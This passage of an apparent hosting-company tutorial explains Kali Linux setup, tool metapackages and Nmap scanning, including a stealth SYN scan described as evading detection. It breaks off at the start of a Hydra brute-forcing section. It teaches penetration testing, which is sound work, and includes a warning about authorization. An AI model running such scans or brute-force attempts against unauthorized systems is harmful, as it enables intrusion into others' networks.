{"id":119150,"date":"2024-11-22T14:03:13","date_gmt":"2024-11-22T14:03:13","guid":{"rendered":"\/tutorials\/?p=119150"},"modified":"2026-03-10T10:23:12","modified_gmt":"2026-03-10T10:23:12","slug":"kali-linux-tutorial","status":"publish","type":"post","link":"\/in\/tutorials\/kali-linux-tutorial","title":{"rendered":"Kali Linux tutorial: Essential commands, managing Kali tools, running scans, and more"},"content":{"rendered":"<?xml encoding=\"utf-8\" ?><p>As a security-focused operating system, Kali Linux lets you perform various tasks, such as penetration testing, digital forensics, and network analysis. With hundreds of security tools, Kali Linux is ideal for cybersecurity specialists and enthusiasts looking to expand their skills.<\/p><p>If you&rsquo;re interested in using Kali Linux but unsure where to start, you&rsquo;re in the right place. In this article, you&rsquo;ll learn how to run Kali Linux on a virtual private server (VPS), explore its essential commands, and manage its powerful tools.<\/p><p>You&rsquo;ll also get a chance to gain hands-on experience by conducting security assessments, from running network scans to exploiting vulnerabilities on target systems. By the end of this guide, you&rsquo;ll be ready to use Kali Linux to test and protect your environment confidently.<\/p><p>\n\n\n\n<\/p><h2 class=\"wp-block-heading\" id=\"h-accessing-kali-linux\">Accessing Kali Linux<\/h2><p>The first step for getting started with Kali Linux depends on where you&rsquo;ve installed it. For example, if you&rsquo;ve set up Kali Linux on a desktop computer, simply power on the device and log in directly. 
However, if you&rsquo;ve <a href=\"\/in\/tutorials\/how-to-install-kali-linux\">installed Kali Linux on Hostinger&rsquo;s VPS<\/a>, follow these steps instead:<\/p><ol class=\"wp-block-list\">\n<li>Log in to hPanel with your Hostinger account and navigate to <strong>VPS &rarr; Manage<\/strong>.<\/li>\n\n\n\n<li>In your VPS dashboard, find the <strong>VPS details<\/strong> section to view your SSH credentials.<\/li>\n<\/ol><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd82640\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/hpanel-vps-overview-vps-details-1024x327.png\" alt=\"The SSH username and IPv4 information in the VPS Overview section of hPanel\"><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><ol start=\"3\" class=\"wp-block-list\">\n<li>Open your terminal application and run the following command, replacing <strong>your_vps_ip_address<\/strong> with your actual 
VPS IP:<\/li>\n<\/ol><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh root@your_vps_ip_address<\/pre><p>Alternatively, hit the <strong>Browser terminal<\/strong> button to access your VPS directly without using any other app.<\/p><ol start=\"4\" class=\"wp-block-list\">\n<li>You&rsquo;ll be prompted to enter your password. Type it carefully and press <strong>Enter<\/strong>.<\/li>\n<\/ol><p>Once authenticated, you have command-line access to the Kali Linux environment on your VPS.<\/p><h2 class=\"wp-block-heading\" id=\"h-essential-kali-linux-commands\">Essential Kali Linux commands<\/h2><p>Kali Linux shares the <a href=\"\/in\/tutorials\/linux-commands\">same commands<\/a> as other Linux distributions for navigation, file manipulation, and system monitoring. 
As a Debian-based distribution, it also uses similar package management commands as Ubuntu and other derivatives, including:<\/p><ul class=\"wp-block-list\">\n<li><strong>apt update<\/strong> &ndash; updates the list of available packages.<\/li>\n\n\n\n<li><strong>apt upgrade<\/strong> &ndash; upgrades all installed packages.<\/li>\n\n\n\n<li><strong>apt install [package_name]<\/strong> &ndash; installs a specific package.<\/li>\n\n\n\n<li><strong>apt remove [package_name]<\/strong> &ndash; uninstalls a package.<\/li>\n<\/ul><p>Since Kali Linux includes specialized security testing tools, you&rsquo;ll want to explore them over time. Here are some essential commands to operate these tools:<\/p><figure tabindex=\"0\" class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>Tool<\/strong><\/td><td><strong>Command<\/strong><\/td><td><strong>Usage<\/strong><\/td><\/tr><tr><td>Nmap<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">nmap [target_ip]<\/code><\/td><td>Scans networks, hosts, and services.<\/td><\/tr><tr><td>Metasploit<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">msfconsole<\/code><\/td><td>Launches the Metasploit console to exploit system vulnerabilities.<\/td><\/tr><tr><td>Aircrack-ng<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">aircrack-ng [options]<\/code><\/td><td>Performs Wi-Fi security testing.<\/td><\/tr><tr><td>Wireshark<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">wireshark<\/code><\/td><td>Analyzes network traffic.<\/td><\/tr><tr><td>Hydra<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">hydra [options]<\/code><\/td><td>Brute-forces logins to test password strength.<\/td><\/tr><tr><td>John the Ripper<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">john [file]<\/code><\/td><td>Cracks password hashes.<\/td><\/tr><tr><td>Nikto<\/td><td><code 
data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">nikto -h [target_ip]<\/code><\/td><td>Scans web servers to find vulnerabilities.<\/td><\/tr><tr><td>SQLmap<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">sqlmap [options]<\/code><\/td><td>Tests databases for SQL injection vulnerabilities.<\/td><\/tr><tr><td>Lynis<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">lynis audit system<\/code><\/td><td>Audits system security configurations.<\/td><\/tr><tr><td>Snort<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">snort [options]<\/code><\/td><td>Monitors network traffic for suspicious activity.<\/td><\/tr><\/tbody><\/table><\/figure><p>To work more efficiently in Kali Linux, consider learning these useful command-line shortcuts:<\/p><ul class=\"wp-block-list\">\n<li><strong>history<\/strong> &ndash; lists recent commands for easy reuse.<\/li>\n\n\n\n<li><strong>![number]<\/strong> &ndash; re-runs a command by its number from the history list.<\/li>\n\n\n\n<li><strong>clear<\/strong> &ndash; clears the terminal screen.<\/li>\n\n\n\n<li><strong>--help<\/strong> &ndash; provides usage information for most commands.<\/li>\n<\/ul><h2 class=\"wp-block-heading\" id=\"h-managing-kali-tools\">Managing Kali tools<\/h2><p>Kali Linux uses metapackages to install groups of related tools for specific security tasks. If you need Kali Linux for a particular purpose, you can install a metapackage tailored to that task instead of installing the entire toolset.<\/p><p>When you set up Kali Linux on your VPS, you received only the <strong>kali-linux-core<\/strong> package containing essential core tools. 
To verify which metapackages and tools are already installed, execute:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">apt list --installed | grep kali<\/pre><p>Here&rsquo;s the expected output:<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd83a8a\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"718\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-apt-list-installed-output-1024x718.png\" alt=\"The output of the apt list --installed command\" class=\"wp-image-119154\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-1024x718.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-300x210.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-150x105.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-768x539.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-1536x1077.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-2048x1436.png 2048w\" sizes=\"(max-width: 1024px) 
100vw, 1024px\" \/><\/figure><\/div><p>If you want to install additional packages, first update the system to maintain compatibility and avoid dependency issues:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update\n\nsudo apt -y full-upgrade<\/pre><p>Then, install your desired metapackage. In this example, we&rsquo;ll use <strong>kali-linux-default<\/strong>, which includes various popular Kali Linux tools:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install -y kali-linux-default<\/pre><p>You can also install other metapackages based on your needs. 
Here are some options:<\/p><ul class=\"wp-block-list\">\n<li><strong>kali-linux-headless<\/strong> &ndash; core tools without a graphical interface, ideal for VPS setups.<\/li>\n\n\n\n<li><strong>kali-linux-arm<\/strong> &ndash; tools optimized for ARM-based devices.<\/li>\n\n\n\n<li><strong>kali-linux-nethunter<\/strong> &ndash; for mobile penetration testing.<\/li>\n\n\n\n<li><strong>kali-tools-information-gathering<\/strong> &ndash; to collect data about targets.<\/li>\n\n\n\n<li><strong>kali-tools-vulnerability<\/strong> &ndash; to detect and analyze vulnerabilities.<\/li>\n\n\n\n<li><strong>kali-tools-web<\/strong> &ndash; for web application security testing.<\/li>\n\n\n\n<li><strong>kali-tools-passwords<\/strong> &ndash; to test and crack passwords.<\/li>\n\n\n\n<li><strong>kali-tools-database<\/strong> &ndash; to assess database security.<\/li>\n\n\n\n<li><strong>kali-tools-wireless<\/strong> &ndash; to test wireless network security.<\/li>\n\n\n\n<li><strong>kali-tools-reverse-engineering<\/strong> &ndash; to deconstruct and analyze malware.<\/li>\n\n\n\n<li><strong>kali-tools-exploitation<\/strong> &ndash; to exploit system vulnerabilities.<\/li>\n\n\n\n<li><strong>kali-tools-social-engineering<\/strong> &ndash; for social engineering scenarios.<\/li>\n\n\n\n<li><strong>kali-tools-sniffing-spoofing<\/strong> &ndash; to detect and imitate suspicious network traffic.<\/li>\n\n\n\n<li><strong>kali-tools-post-exploitation<\/strong> &ndash; to secure access post-exploitation.<\/li>\n\n\n\n<li><strong>kali-tools-forensics<\/strong> &ndash; for digital forensics and investigations.<\/li>\n\n\n\n<li><strong>kali-tools-reporting<\/strong> &ndash; to document and report findings.<\/li>\n<\/ul><p>If you prefer, you can also install individual tools. 
For example:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install nmap<\/pre><p>Conversely, if you find certain tools unnecessary and want to free up space, you can delete them individually:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt remove [tool_name]<\/pre><p>Or, if you no longer need an entire metapackage, remove it with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt remove [metapackage_name]<\/pre><h2 class=\"wp-block-heading\" id=\"h-using-kali-linux-for-security-testing\">Using Kali Linux for security testing<\/h2><p>This section demonstrates how to perform security testing using our Kali Linux VPS as the attack machine and another VPS with Ubuntu <strong>24.04<\/strong> as the target system.<\/p><p>For both servers, we use plans from Hostinger.<\/p><p>For the attack machine, we chose <a href=\"\/in\/vps\/kali-linux-hosting\">Kali VPS hosting&rsquo;s<\/a> KVM 1 plan, which offers <strong>4 GB<\/strong> of RAM and <strong>50 GB<\/strong> of NVMe storage for <strong>\u20b9599.00\/month<\/strong> &ndash; meeting Kali Linux&rsquo;s minimum requirements.<\/p><p>You can choose any plan for the target system, but we opted for a regular VPS <strong>KVM 1<\/strong> plan.<\/p><p>    <p class=\"warning\">\n        <strong>Warning!<\/strong> Always make sure you have permission to test any server or network. 
<strong>Unauthorized testing is illegal and unethical<\/strong>. In our case, we can practice freely since we own both VPS instances.    <\/p>\n    \n\n\n\n<\/p><h3 class=\"wp-block-heading\" id=\"h-running-network-scans-with-nmap\">Running network scans with Nmap<\/h3><p>Nmap is a network scanning tool for vulnerability assessment. Since you use two separate servers as the attack machine and target system, you&rsquo;re perfectly set up for network discovery and mapping using Nmap. Here&rsquo;s how:<\/p><p><strong>Basic Nmap scan<\/strong><\/p><p>To start with a simple scan, run:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap [target_ip]<\/pre><p>Replace <strong>[target_ip]<\/strong> with your target VPS&rsquo;s IP address. For Hostinger users, you can find the server&rsquo;s IP in hPanel by navigating to the same <strong>VPS details<\/strong> section of your dashboard.<\/p><p>When executed, this command will:<\/p><ul class=\"wp-block-list\">\n<li>Discover open ports on the target.<\/li>\n\n\n\n<li>Identify active services.<\/li>\n\n\n\n<li>Provide preliminary information about the services.<\/li>\n<\/ul><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd84317\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"300\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-output-1024x300.png\" alt=\"The output of the nmap command\" 
class=\"wp-image-119159\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-1024x300.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-300x88.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-150x44.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-768x225.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-1536x451.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-2048x601.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Service and version detection<\/strong><\/p><p>To gather additional information about the services running on open ports, use the following:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -sV [target_ip]<\/pre><p>This command enables version 
detection for each service, helping you identify possible vulnerabilities in specific software versions.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd848c4\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"144\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-sv-output-1024x144.png\" alt=\"The output of the nmap -sV command\" class=\"wp-image-119160\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-1024x144.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-300x42.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-150x21.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-768x108.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-1536x216.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-2048x288.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" 
height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>OS detection<\/strong><\/p><p>To determine the operating system running on the target, execute:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -O [target_ip]<\/pre><p>The <strong>-O<\/strong> flag enables OS detection, which guesses the operating system based on the target&rsquo;s responses. Remember that Nmap may not always guess correctly, as it only provides a probability percentage for each OS match.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd84e41\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"370\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-o-output-1024x370.png\" alt=\"The output of the nmap -O command\" class=\"wp-image-119161\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-1024x370.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-300x109.png 300w, 
https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-150x54.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-768x278.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-1536x556.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-2048x741.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Complete scan with service, OS, and aggressive timing<\/strong><\/p><p>For a thorough scan that includes common ports, running services, and OS detection, run:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -A [target_ip]<\/pre><p>This command is more aggressive, sending more customized packets called probes to gather information, which might trigger firewalls or intrusion detection systems.<\/p><p>The <strong>-A<\/strong> option enables:<\/p><ul class=\"wp-block-list\">\n<li>OS detection.<\/li>\n\n\n\n<li>Version 
detection.<\/li>\n\n\n\n<li>Script scanning.<\/li>\n\n\n\n<li>Traceroute.<\/li>\n<\/ul><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd85669\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"605\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-a-output-1024x605.png\" alt=\"The output of the nmap -A command\" class=\"wp-image-119162\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-1024x605.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-300x177.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-150x89.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-768x454.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-1536x908.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-2048x1210.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" 
viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Stealth scan to avoid detection<\/strong><\/p><p>In contrast, if you prefer a subtle scan that&rsquo;s less likely to be detected by firewalls or intrusion detection systems, try a TCP SYN scan:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -sS [target_ip]<\/pre><p>The <strong>-sS<\/strong> flag performs a SYN scan, also called a &ldquo;half-open&rdquo; scan, which doesn&rsquo;t fully establish a TCP connection, making it less likely to trigger alarms.<\/p><p><strong>Scan specific ports<\/strong><\/p><p>You can specify a range if you only need to scan certain ports. For example:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -p 1-100 [target_ip]<\/pre><p>This scans ports <strong>1<\/strong> through <strong>100<\/strong> only. 
Adjust the range as needed to save time.<\/p><p><strong>Save scan results<\/strong><\/p><p>You can save your scan results to files for later analysis:<\/p><ul class=\"wp-block-list\">\n<li>Normal output, useful for quick reviews:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -oN scan_results.txt [target_ip]<\/pre><ul class=\"wp-block-list\">\n<li>XML format, ideal for importing results into other tools:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -oX scan_results.xml [target_ip]<\/pre><h3 class=\"wp-block-heading\" id=\"h-brute-forcing-login-credentials-with-hydra\">Brute-forcing login credentials with Hydra<\/h3><p>You can also utilize Kali Linux to test login credentials using Hydra. It&rsquo;s a powerful password-cracking tool that works on various protocols, including SSH, FTP, and 